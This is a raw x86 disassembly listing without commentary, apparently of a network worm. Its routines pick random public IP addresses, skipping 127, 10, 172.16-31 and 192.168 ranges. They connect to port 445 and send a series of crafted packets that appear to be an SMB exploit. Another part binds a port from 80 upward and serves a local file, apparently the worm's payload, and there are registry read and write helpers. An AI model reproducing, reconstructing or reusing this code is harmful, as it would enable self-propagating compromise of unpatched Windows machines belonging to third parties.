push offset sub_40401C
push offset sub_40109A
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp-18h], esp
push eax
fnstcw word ptr [esp]
or word ptr [esp], 300h
fldcw word ptr [esp]
add esp, 4
push 0
push 0
push 404028h
push offset sub_404024
push 404020h
call sub_43F8B1
push dword ptr ds:sub_404024+4
push dword ptr ds:sub_404024
push dword ptr ds:sub_40401C+4
mov dword ptr ds:loc_404010+4, esp
call sub_43F609
add esp, 18h
xor ecx, ecx
mov [ebp-4], ecx
push eax
call sub_43F8C9
leave
retn
; ---------------------------------------------------------------------------
db 64h, 0A3h, 0
dd 0C3000000h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E245 proc near ; CODE XREF: sub_43E2E0+12�p
var_35 = byte ptr -35h
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
push 2
lea eax, [ebp+var_35]
push eax
push [ebp+arg_0]
call sub_43F8A5
add esp, 0Ch
lea ecx, [ebp+var_35]
or eax, 0FFFFFFFFh
loc_43E268: ; CODE XREF: sub_43E245+28�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43E268
mov ebx, eax
mov [ebp+var_2], bl
mov [ebp+var_1], 0
jmp short loc_43E290
; ---------------------------------------------------------------------------
loc_43E27A: ; CODE XREF: sub_43E245+55�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
sub edx, eax
dec edx
mov al, [ebp+eax+var_35]
mov [edi+edx], al
add [ebp+var_1], 1
loc_43E290: ; CODE XREF: sub_43E245+33�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
cmp eax, edx
jl short loc_43E27A
movzx eax, [ebp+var_2]
mov byte ptr [edi+eax], 0
mov [ebp+var_3], 0
jmp short loc_43E2BC
; ---------------------------------------------------------------------------
loc_43E2AA: ; CODE XREF: sub_43E245+88�j
push offset sub_404DE5
push edi
call sub_43F929
add esp, 8
add [ebp+var_3], 1
loc_43E2BC: ; CODE XREF: sub_43E245+63�j
movzx eax, [ebp+var_3]
mov edx, 20h
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jl short loc_43E2AA
push [ebp+arg_8]
push edi
call sub_43F929
add esp, 8
pop edi
pop esi
pop ebx
leave
retn
sub_43E245 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E2E0 proc near ; CODE XREF: sub_43F401+97�p
var_32 = byte ptr -32h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34h
push 404DE3h
lea eax, [ebp+var_32]
push eax
push [ebp+arg_0]
call sub_43E245
add esp, 0Ch
lea eax, [ebp+var_32]
push eax
call sub_43F719
leave
retn
sub_43E2E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E305 proc near ; CODE XREF: .data:0043F3BF�p
; sub_43F401+F1�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push eax
push edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_43F869
mov edi, eax
or edi, edi
jz short loc_43E335
xor eax, eax
jmp short loc_43E36D
; ---------------------------------------------------------------------------
loc_43E335: ; CODE XREF: sub_43E305+2A�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_43F899
mov edi, eax
push [ebp+var_4]
call sub_43F875
or edi, edi
jz short loc_43E35D
xor eax, eax
jmp short loc_43E36D
; ---------------------------------------------------------------------------
loc_43E35D: ; CODE XREF: sub_43E305+52�j
cmp [ebp+var_8], 1
jnz short loc_43E36A
mov eax, 2
jmp short loc_43E36D
; ---------------------------------------------------------------------------
loc_43E36A: ; CODE XREF: sub_43E305+5C�j
xor eax, eax
inc eax
loc_43E36D: ; CODE XREF: sub_43E305+2E�j
; sub_43E305+56�j ...
pop edi
leave
retn
sub_43E305 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E370 proc near ; CODE XREF: .data:0043F398�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push edi
lea eax, [ebp+var_4]
push eax
push 20019h
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_43F881
mov edi, eax
or edi, edi
jz short loc_43E395
xor eax, eax
jmp short loc_43E3C0
; ---------------------------------------------------------------------------
loc_43E395: ; CODE XREF: sub_43E370+1F�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_43F88D
mov edi, eax
push [ebp+var_4]
call sub_43F875
or edi, edi
jz short loc_43E3BD
xor eax, eax
jmp short loc_43E3C0
; ---------------------------------------------------------------------------
loc_43E3BD: ; CODE XREF: sub_43E370+47�j
xor eax, eax
inc eax
loc_43E3C0: ; CODE XREF: sub_43E370+23�j
; sub_43E370+4B�j
pop edi
leave
retn
sub_43E370 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 200h
push ebx
push esi
push edi
xor ebx, ebx
push 0
push 100h
lea eax, [ebp-100h]
push eax
push dword ptr [ebp+8]
call sub_43F5C1
cmp eax, 0FFFFFFFFh
jz loc_43E507
push offset sub_404DDF
lea eax, [ebp-100h]
push eax
call sub_43F941
add esp, 8
or eax, eax
jz loc_43E4C9
push 404DDBh
lea edx, [ebp-100h]
push edx
call sub_43F941
add esp, 8
or eax, eax
jz loc_43E4C9
push 0
push 3Dh
push 404D9Dh
push dword ptr [ebp+8]
call sub_43F5CD
push dword ptr ds:loc_403004
push 404D86h
lea eax, [ebp-200h]
push eax
call sub_43F911
add esp, 0Ch
lea ecx, [ebp-200h]
or eax, 0FFFFFFFFh
loc_43E45C: ; CODE XREF: .data:0043E461�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43E45C
push 0
push eax
lea edx, [ebp-200h]
push edx
push dword ptr [ebp+8]
call sub_43F5CD
loc_43E475: ; CODE XREF: .data:0043E4BB�j
mov eax, dword ptr ds:loc_403004
mov edi, eax
sub edi, ebx
cmp edi, 1000h
jb short loc_43E48B
mov edi, 1000h
loc_43E48B: ; CODE XREF: .data:0043E484�j
or edi, edi
jz short loc_43E4BD
push 0
push edi
mov eax, ebx
add eax, dword ptr ds:loc_403004+4
push eax
push dword ptr [ebp+8]
call sub_43F5CD
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_43E507
cmp esi, 1000h
jb short loc_43E4BD
add ebx, esi
push 64h
call sub_43F779
jmp short loc_43E475
; ---------------------------------------------------------------------------
loc_43E4BD: ; CODE XREF: .data:0043E48D�j
; .data:0043E4B0�j
push offset sub_404098
call sub_43F731
jmp short loc_43E4EB
; ---------------------------------------------------------------------------
loc_43E4C9: ; CODE XREF: .data:0043E406�j
; .data:0043E422�j
push 0
push 15h
push 404D70h
push dword ptr [ebp+8]
call sub_43F5CD
push 0
push 0Dh
push 40409Ch
push dword ptr [ebp+8]
call sub_43F5CD
loc_43E4EB: ; CODE XREF: .data:0043E4C7�j
push 7D0h
call sub_43F779
push 2
push dword ptr [ebp+8]
call sub_43F5D9
push dword ptr [ebp+8]
call sub_43F561
loc_43E507: ; CODE XREF: .data:0043E3EA�j
; .data:0043E4A8�j
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
push 0
push offset sub_404098
call sub_43F725
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push 403010h
call sub_43F749
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_43E54D
push 1
call sub_43F6B9
loc_43E54D: ; CODE XREF: .data:0043E544�j
push 0
push ebx
call sub_43F6DD
mov dword ptr ds:loc_403004, eax
push eax
push 0
call sub_43F73D
mov dword ptr ds:loc_403004+4, eax
push 0
lea eax, [ebp-30h]
push eax
push dword ptr ds:loc_403004
push dword ptr ds:loc_403004+4
push ebx
call sub_43F755
push ebx
call sub_43F6F5
push 0
push 1
push 2
call sub_43F5E5
mov esi, eax
push 10h
lea eax, [ebp-24h]
push eax
call sub_43F76D
mov word ptr [ebp-24h], 2
and dword ptr [ebp-20h], 0
mov word ptr [ebp-26h], 0
loc_43E5AD: ; CODE XREF: .data:0043E5ED�j
movzx eax, word ptr [ebp-26h]
add eax, 50h
mov word ptr ds:loc_404094, ax
movzx eax, word ptr ds:loc_404094
push eax
call sub_43F591
mov edx, eax
mov [ebp-22h], dx
push 10h
lea eax, [ebp-24h]
push eax
push esi
call sub_43F555
mov [ebp-2Ch], eax
inc word ptr [ebp-26h]
or eax, eax
jz short loc_43E5EF
movzx eax, word ptr [ebp-26h]
cmp eax, 0FDE8h
jl short loc_43E5AD
loc_43E5EF: ; CODE XREF: .data:0043E5E2�j
push 64h
push esi
call sub_43F5B5
mov dword ptr [ebp-4], 10h
loc_43E5FE: ; CODE XREF: .data:0043E629�j
lea eax, [ebp-4]
push eax
lea eax, [ebp-14h]
push eax
push esi
call sub_43F549
mov edi, eax
lea eax, [ebp-34h]
push eax
push 0
push edi
push 40141Ah
push 0
push 0
call sub_43F79D
push eax
call sub_43F6F5
jmp short loc_43E5FE
; ---------------------------------------------------------------------------
db 5Fh
dd 0C3C95B5Eh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E630 proc near ; CODE XREF: .data:0043EE63�p
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_13 = byte ptr -13h
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
lea edi, [ebp+var_13]
lea esi, sub_4040AA
mov ecx, 4
rep movsd
lea edi, [ebp+var_18]
lea esi, loc_4040B9+1
mov ecx, 5
rep movsb
loc_43E659: ; CODE XREF: sub_43E630+51�j
; sub_43E630+74�j
call sub_43F8F9
mov ecx, 0DDh
cdq
idiv ecx
lea edi, [edx+3]
mov ebx, edi
mov [ebp+var_3], bl
mov [ebp+var_2], 0
jmp short loc_43E6AA
; ---------------------------------------------------------------------------
loc_43E676: ; CODE XREF: sub_43E630+81�j
mov al, [ebp+var_3]
movzx edx, [ebp+var_2]
cmp al, [ebp+edx+var_13]
jz short loc_43E659
movzx eax, [ebp+var_2]
cmp eax, 5
jnb short loc_43E6A6
movzx eax, [ebp+var_3]
movzx edx, [ebp+var_2]
movzx ecx, [ebp+edx+var_13]
cmp eax, ecx
jb short loc_43E6A6
movzx edx, [ebp+edx+var_18]
cmp eax, edx
jbe short loc_43E659
loc_43E6A6: ; CODE XREF: sub_43E630+5A�j
; sub_43E630+6B�j
inc [ebp+var_2]
loc_43E6AA: ; CODE XREF: sub_43E630+44�j
movzx eax, [ebp+var_2]
cmp eax, 10h
jb short loc_43E676
loc_43E6B3: ; CODE XREF: sub_43E630+AC�j
call sub_43F8F9
mov ecx, 0FDh
cdq
idiv ecx
lea edi, [edx+1]
mov ebx, edi
mov [ebp+var_19], bl
movzx eax, [ebp+var_3]
cmp eax, 0C0h
jnz short loc_43E6DE
movzx eax, [ebp+var_19]
cmp eax, 0A8h
jz short loc_43E6B3
loc_43E6DE: ; CODE XREF: sub_43E630+A1�j
call sub_43F8F9
mov ecx, 0FDh
cdq
idiv ecx
lea edi, [edx+1]
mov ebx, edi
mov [ebp+var_1A], bl
call sub_43F8F9
mov ecx, 0FDh
cdq
idiv ecx
lea edi, [edx+1]
mov ebx, edi
mov [ebp+var_1B], bl
movzx eax, [ebp+var_1B]
push eax
movzx eax, [ebp+var_1A]
push eax
movzx eax, [ebp+var_19]
push eax
movzx eax, [ebp+var_3]
push eax
push 404D64h
push [ebp+arg_0]
call sub_43F911
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_43E630 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E731 proc near ; CODE XREF: .data:0043F068�p
var_89F4 = dword ptr -89F4h
var_89F0 = dword ptr -89F0h
var_89EC = dword ptr -89ECh
var_89E8 = dword ptr -89E8h
var_89E3 = byte ptr -89E3h
var_89E2 = word ptr -89E2h
var_89E0 = byte ptr -89E0h
var_89D8 = byte ptr -89D8h
var_8970 = byte ptr -8970h
var_6900 = byte ptr -6900h
var_68E2 = byte ptr -68E2h
var_6842 = byte ptr -6842h
var_6136 = dword ptr -6136h
var_6126 = byte ptr -6126h
var_6112 = byte ptr -6112h
var_60A2 = byte ptr -60A2h
var_55DE = byte ptr -55DEh
var_403A = byte ptr -403Ah
var_4039 = byte ptr -4039h
var_3FBD = byte ptr -3FBDh
var_37ED = byte ptr -37EDh
var_3342 = byte ptr -3342h
var_3058 = dword ptr -3058h
var_3054 = dword ptr -3054h
var_3050 = dword ptr -3050h
var_304C = word ptr -304Ch
var_304A = word ptr -304Ah
var_3048 = dword ptr -3048h
var_303C = byte ptr -303Ch
var_3039 = byte ptr -3039h
var_300F = byte ptr -300Fh
var_300D = byte ptr -300Dh
var_300C = byte ptr -300Ch
var_2FC7 = byte ptr -2FC7h
var_2F83 = byte ptr -2F83h
var_2987 = byte ptr -2987h
var_21A3 = byte ptr -21A3h
var_2193 = byte ptr -2193h
var_1E6F = byte ptr -1E6Fh
var_1E6B = byte ptr -1E6Bh
var_1E5F = byte ptr -1E5Fh
var_1BDA = byte ptr -1BDAh
var_1BD9 = byte ptr -1BD9h
var_B46 = byte ptr -0B46h
var_82 = byte ptr -82h
var_81 = byte ptr -81h
var_80 = dword ptr -80h
var_7C = byte ptr -7Ch
var_54 = dword ptr -54h
var_50 = byte ptr -50h
var_4F = byte ptr -4Fh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 89F4h
call sub_43F66D
push ebx
push esi
push edi
mov [ebp+var_3054], 1
mov [ebp+var_89F0], 1
lea edi, [ebp+var_89E0]
lea esi, sub_4049F0
movsd
movsd
and [ebp+var_89F4], 0
mov [ebp+var_89E2], 1BDh
push 0
push 1
push 2
call sub_43F5E5
mov [ebp+var_54], eax
cmp eax, 0FFFFFFFFh
jz loc_43ED87
mov eax, [ebp+arg_0]
mov [ebp+var_89EC], eax
push eax
call sub_43F5A9
push 1Dh
push eax
lea edi, [ebp+var_6900]
push edi
call sub_43F785
lea eax, [ebp+var_6900]
push eax
push 404D5Ah
lea eax, [ebp+var_7C]
push eax
call sub_43F911
add esp, 0Ch
xor ebx, ebx
loc_43E7C2: ; CODE XREF: sub_43E731+A2�j
mov dl, [ebp+ebx+var_7C]
mov [ebp+ebx*2+var_50], dl
mov [ebp+ebx*2+var_4F], 0
inc ebx
cmp ebx, 28h
jl short loc_43E7C2
push 60h
push offset sub_404525
lea eax, [ebp+var_303C]
push eax
call sub_43F8D5
lea eax, [ebp+var_7C]
push eax
call sub_43F791
mov edi, eax
shl edi, 1
push edi
lea edi, [ebp+var_50]
push edi
lea edi, [ebp+var_300C]
push edi
call sub_43F8D5
lea eax, [ebp+var_7C]
push eax
call sub_43F791
push 9
push offset sub_40457C
mov edi, eax
shl edi, 1
lea edi, [ebp+edi+var_300D]
push edi
call sub_43F8D5
lea eax, [ebp+var_7C]
push eax
call sub_43F791
mov edx, eax
movsx edi, dl
shl edi, 1
add edi, 34h
mov edx, edi
mov [ebp+var_403A], dl
push 1
lea eax, [ebp+var_403A]
push eax
lea eax, [ebp+var_3039]
push eax
call sub_43F8D5
lea eax, [ebp+var_7C]
push eax
call sub_43F791
mov edx, eax
movsx edi, dl
shl edi, 1
add edi, 9
mov edx, edi
mov [ebp+var_89E3], dl
push 1
lea eax, [ebp+var_89E3]
push eax
lea eax, [ebp+var_300F]
push eax
call sub_43F8D5
mov eax, [ebp+arg_4]
mov [ebp+var_3058], eax
push 0E29h
push 31h
lea eax, [ebp+var_4039]
push eax
call sub_43F8E1
add esp, 48h
push 10h
lea eax, [ebp+var_304C]
push eax
call sub_43F76D
mov [ebp+var_304C], 2
movsx eax, [ebp+var_89E2]
movzx eax, ax
push eax
call sub_43F591
mov edi, eax
mov [ebp+var_304A], di
mov eax, [ebp+arg_0]
mov [ebp+var_3048], eax
push 10h
lea eax, [ebp+var_304C]
push eax
push [ebp+var_54]
call sub_43F56D
cmp eax, 0FFFFFFFFh
jnz short loc_43E904
mov [ebp+var_3054], 2
jmp loc_43ED7F
; ---------------------------------------------------------------------------
loc_43E904: ; CODE XREF: sub_43E731+1C2�j
push 64h
call sub_43F779
push 0
push 89h
push 404313h
push [ebp+var_54]
call sub_43F5CD
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_43F779
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_43F5C1
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43ED75
push 0
push 0A8h
push 40439Dh
push [ebp+var_54]
call sub_43F5CD
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_43F779
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_43F5C1
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43ED75
push 0
push 0DEh
push 404446h
push [ebp+var_54]
call sub_43F5CD
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_43F779
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_43F5C1
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43ED75
mov eax, [ebp+var_80]
cmp eax, 0FFFFFFFFh
jz short loc_43E9DE
cmp eax, 46h
jge short loc_43E9E3
loc_43E9DE: ; CODE XREF: sub_43E731+2A6�j
jmp loc_43ED75
; ---------------------------------------------------------------------------
loc_43E9E3: ; CODE XREF: sub_43E731+2AB�j
lea eax, [ebp+var_2F83]
mov [ebp+var_89E8], eax
cmp byte ptr [eax], 31h
setnz al
and eax, 1
mov [ebp+var_3050], eax
jz loc_43EAF7
push 0DACh
push 90h
lea eax, [ebp+var_2987]
push eax
call sub_43F8E1
push 4
imul eax, [ebp+var_3050], 3Ch
lea eax, ds:404938h[eax]
push eax
lea eax, [ebp+var_21A3]
push eax
call sub_43F8D5
push [ebp+arg_8]
push [ebp+var_3058]
lea eax, [ebp+var_2193]
push eax
call sub_43F8D5
push 4
push 404D55h
lea eax, [ebp+var_1E6F]
push eax
call sub_43F8D5
push 4
imul eax, [ebp+var_3050], 3Ch
lea eax, ds:404938h[eax]
push eax
lea eax, [ebp+var_1E6B]
push eax
call sub_43F8D5
push [ebp+var_3058]
call sub_43F791
push eax
push [ebp+var_3058]
lea edi, [ebp+var_1E5F]
push edi
call sub_43F8D5
add esp, 48h
xor ebx, ebx
loc_43EA9F: ; CODE XREF: sub_43E731+38B�j
mov dl, [ebp+ebx+var_2987]
mov [ebp+ebx*2+var_1BDA], dl
mov [ebp+ebx*2+var_1BD9], 0
inc ebx
cmp ebx, 0DACh
jl short loc_43EA9F
mov [ebp+var_82], 0
mov [ebp+var_81], 0
push 1C52h
push 31h
lea eax, [ebp+var_89D8]
push eax
call sub_43F8E1
push 1C52h
push 31h
lea eax, [ebp+var_6112]
push eax
call sub_43F8E1
add esp, 18h
jmp short loc_43EB59
; ---------------------------------------------------------------------------
loc_43EAF7: ; CODE XREF: sub_43E731+2CD�j
push 7D0h
push 90h
lea eax, [ebp+var_68E2]
push eax
call sub_43F8E1
push [ebp+var_3058]
call sub_43F791
push eax
push [ebp+var_3058]
lea edi, [ebp+var_6842]
push edi
call sub_43F8D5
lea eax, [ebp+var_89E0]
push eax
call sub_43F791
push eax
lea edi, [ebp+var_89E0]
push edi
lea edi, [ebp+var_6126]
push edi
call sub_43F8D5
add esp, 24h
mov eax, dword ptr ds:loc_404936+2
mov [ebp+var_6136], eax
loc_43EB59: ; CODE XREF: sub_43E731+3C4�j
push 0
movsx eax, [ebp+var_403A]
add eax, 4
push eax
lea eax, [ebp+var_303C]
push eax
push [ebp+var_54]
call sub_43F5CD
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_43F779
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_43F5C1
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43ED75
push 0
push 68h
push offset sub_404586
push [ebp+var_54]
call sub_43F5CD
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_43F779
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_43F5C1
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43ED75
push 0
push 0A0h
push offset sub_4045EF
push [ebp+var_54]
call sub_43F5CD
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_43F779
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_43F5C1
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43ED75
cmp [ebp+var_3050], 0
jz loc_43ED01
push 68h
push 40479Eh
lea eax, [ebp+var_89D8]
push eax
call sub_43F8D5
push 1B5Ah
lea eax, [ebp+var_1BDA]
push eax
lea eax, [ebp+var_8970]
push eax
call sub_43F8D5
push 70h
push 404807h
lea eax, [ebp+var_6112]
push eax
call sub_43F8D5
push 0A5Eh
lea eax, [ebp+var_B46]
push eax
lea eax, [ebp+var_60A2]
push eax
call sub_43F8D5
push 84h
push offset sub_404878
lea eax, [ebp+var_55DE]
push eax
call sub_43F8D5
add esp, 3Ch
push 0
push 10FCh
lea eax, [ebp+var_89D8]
push eax
push [ebp+var_54]
call sub_43F5CD
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_43F779
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_43F5C1
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43ED75
push 0
push 0FDCh
lea eax, [ebp+var_6112]
push eax
push [ebp+var_54]
call sub_43F5CD
cmp eax, 0FFFFFFFFh
jnz short loc_43ED67
jmp short loc_43ED67
; ---------------------------------------------------------------------------
loc_43ED01: ; CODE XREF: sub_43E731+4FA�j
push 7Ch
push 404690h
lea eax, [ebp+var_4039]
push eax
call sub_43F8D5
push 7D0h
lea eax, [ebp+var_68E2]
push eax
lea eax, [ebp+var_3FBD]
push eax
call sub_43F8D5
push 90h
push 40470Dh
lea eax, [ebp+var_37ED]
push eax
call sub_43F8D5
add esp, 24h
mov [ebp+var_3342], 0
push 0
push 0CF8h
lea eax, [ebp+var_4039]
push eax
push [ebp+var_54]
call sub_43F5CD
cmp eax, 0FFFFFFFFh
jnz short $+2
loc_43ED67: ; CODE XREF: sub_43E731+5CC�j
; sub_43E731+5CE�j
push 64h
call sub_43F779
and [ebp+var_3054], 0
loc_43ED75: ; CODE XREF: sub_43E731+216�j
; sub_43E731+258�j ...
push 2
push [ebp+var_54]
call sub_43F5D9
loc_43ED7F: ; CODE XREF: sub_43E731+1CE�j
push [ebp+var_54]
call sub_43F561
loc_43ED87: ; CODE XREF: sub_43E731+53�j
mov eax, [ebp+var_3054]
pop edi
pop esi
pop ebx
leave
retn
sub_43E731 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43ED92 proc near ; CODE XREF: .data:loc_43EE06�p
var_32 = byte ptr -32h
push ebp
mov ebp, esp
sub esp, 34h
push esi
push edi
push 31h
lea eax, [ebp+var_32]
push eax
call sub_43F585
cmp eax, 0FFFFFFFFh
jnz short loc_43EDAE
xor eax, eax
jmp short loc_43EDC8
; ---------------------------------------------------------------------------
loc_43EDAE: ; CODE XREF: sub_43ED92+16�j
lea eax, [ebp+var_32]
push eax
call sub_43F579
mov edi, eax
or edi, edi
jnz short loc_43EDC1
xor eax, eax
jmp short loc_43EDC8
; ---------------------------------------------------------------------------
loc_43EDC1: ; CODE XREF: sub_43ED92+29�j
mov eax, [edi+0Ch]
mov esi, [eax]
mov eax, [esi]
loc_43EDC8: ; CODE XREF: sub_43ED92+1A�j
; sub_43ED92+2D�j
pop edi
pop esi
leave
retn
sub_43ED92 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
push edi
call sub_43F701
push eax
call sub_43F91D
mov esi, 254h
mov eax, esi
add eax, 0Ah
push eax
push 0
call sub_43F73D
mov ebx, eax
push esi
push 4040BFh
push ebx
call sub_43F8D5
add esp, 10h
loc_43EE06: ; CODE XREF: .data:0043EE20�j
; .data:0043EE5A�j ...
call sub_43ED92
mov [ebp-10Ch], eax
or eax, eax
jnz short loc_43EE22
push 384h
call sub_43F8BD
pop ecx
jmp short loc_43EE06
; ---------------------------------------------------------------------------
loc_43EE22: ; CODE XREF: .data:0043EE13�j
mov al, [ebp-10Ch]
mov [ebp-111h], al
mov al, [ebp-10Bh]
mov [ebp-112h], al
mov al, [ebp-10Ah]
mov [ebp-135h], al
cmp byte ptr [ebp-111h], 7Fh
jnz short loc_43EE5C
push 384h
call sub_43F8BD
pop ecx
jmp short loc_43EE06
; ---------------------------------------------------------------------------
loc_43EE5C: ; CODE XREF: .data:0043EE4D�j
lea eax, [ebp-130h]
push eax
call sub_43E630
push 0
call sub_43F8BD
add esp, 8
call sub_43F8F9
mov ecx, 0FDh
cdq
idiv ecx
mov edi, edx
inc edi
mov edx, edi
mov [ebp-134h], dl
call sub_43F8F9
mov ecx, 0FDh
cdq
idiv ecx
mov edi, edx
inc edi
mov edx, edi
mov [ebp-131h], dl
call sub_43F8F9
mov ecx, 0FDh
cdq
idiv ecx
mov edi, edx
inc edi
mov edx, edi
mov [ebp-132h], dl
call sub_43F8F9
mov ecx, 0Ah
cdq
idiv ecx
mov [ebp-133h], dl
mov al, [ebp-133h]
cmp al, 5
jnb short loc_43EEF9
mov al, [ebp-112h]
mov [ebp-134h], al
mov al, [ebp-133h]
cmp al, 3
jnb short loc_43EEF9
mov al, [ebp-135h]
mov [ebp-131h], al
loc_43EEF9: ; CODE XREF: .data:0043EED5�j
; .data:0043EEEB�j
cmp byte ptr [ebp-111h], 0Ah
jnz short loc_43EF2E
movzx eax, byte ptr [ebp-132h]
push eax
movzx eax, byte ptr [ebp-131h]
push eax
movzx eax, byte ptr [ebp-134h]
push eax
push offset sub_404D49
lea eax, [ebp-130h]
push eax
call sub_43F911
add esp, 14h
loc_43EF2E: ; CODE XREF: .data:0043EF00�j
movzx eax, byte ptr [ebp-111h]
cmp eax, 0ACh
jnz short loc_43EF88
mov al, [ebp-112h]
cmp al, 0Fh
jbe short loc_43EF88
cmp al, 21h
jnb short loc_43EF88
call sub_43F8F9
movzx edi, byte ptr [ebp-132h]
push edi
movzx edi, byte ptr [ebp-131h]
push edi
mov edx, eax
and edx, 8000000Fh
jge short loc_43EF6E
dec edx
or edx, 0FFFFFFF0h
inc edx
loc_43EF6E: ; CODE XREF: .data:0043EF67�j
mov edi, edx
add edi, 10h
push edi
push offset sub_404D3C
lea edi, [ebp-130h]
push edi
call sub_43F911
add esp, 14h
loc_43EF88: ; CODE XREF: .data:0043EF3A�j
; .data:0043EF44�j ...
movzx eax, byte ptr [ebp-111h]
cmp eax, 0C0h
jnz short loc_43EFC8
movzx eax, byte ptr [ebp-112h]
cmp eax, 0A8h
jnz short loc_43EFC8
movzx eax, byte ptr [ebp-132h]
push eax
movzx eax, byte ptr [ebp-131h]
push eax
push 404D2Eh
lea eax, [ebp-130h]
push eax
call sub_43F911
add esp, 10h
loc_43EFC8: ; CODE XREF: .data:0043EF94�j
; .data:0043EFA2�j
lea eax, [ebp-130h]
push eax
call sub_43F59D
cmp [ebp-10Ch], eax
jz loc_43EE06
push dword ptr [ebp-10Ch]
call sub_43F5A9
movzx edi, word ptr ds:loc_404094
push edi
push eax
push 404D27h
lea edi, [ebp-0FFh]
push edi
call sub_43F911
add esp, 10h
loc_43F008: ; CODE XREF: .data:0043F031�j
lea ecx, [ebp-0FFh]
or eax, 0FFFFFFFFh
loc_43F011: ; CODE XREF: .data:0043F016�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F011
cmp eax, 19h
jz short loc_43F033
push offset sub_404D25
lea eax, [ebp-0FFh]
push eax
call sub_43F929
add esp, 8
jmp short loc_43F008
; ---------------------------------------------------------------------------
loc_43F033: ; CODE XREF: .data:0043F01B�j
lea ecx, [ebp-0FFh]
or eax, 0FFFFFFFFh
loc_43F03C: ; CODE XREF: .data:0043F041�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F03C
push eax
lea edi, [ebp-0FFh]
push edi
mov edi, ebx
add edi, 9
push edi
call sub_43F8D5
add esp, 0Ch
lea eax, [ebp-130h]
push eax
call sub_43F59D
push esi
push ebx
push eax
call sub_43E731
add esp, 0Ch
mov [ebp-13Ch], eax
push 0
call sub_43F8BD
add esp, 4
jmp loc_43EE06
; ---------------------------------------------------------------------------
db 5Fh, 5Eh, 5Bh
dd 4C2C9h
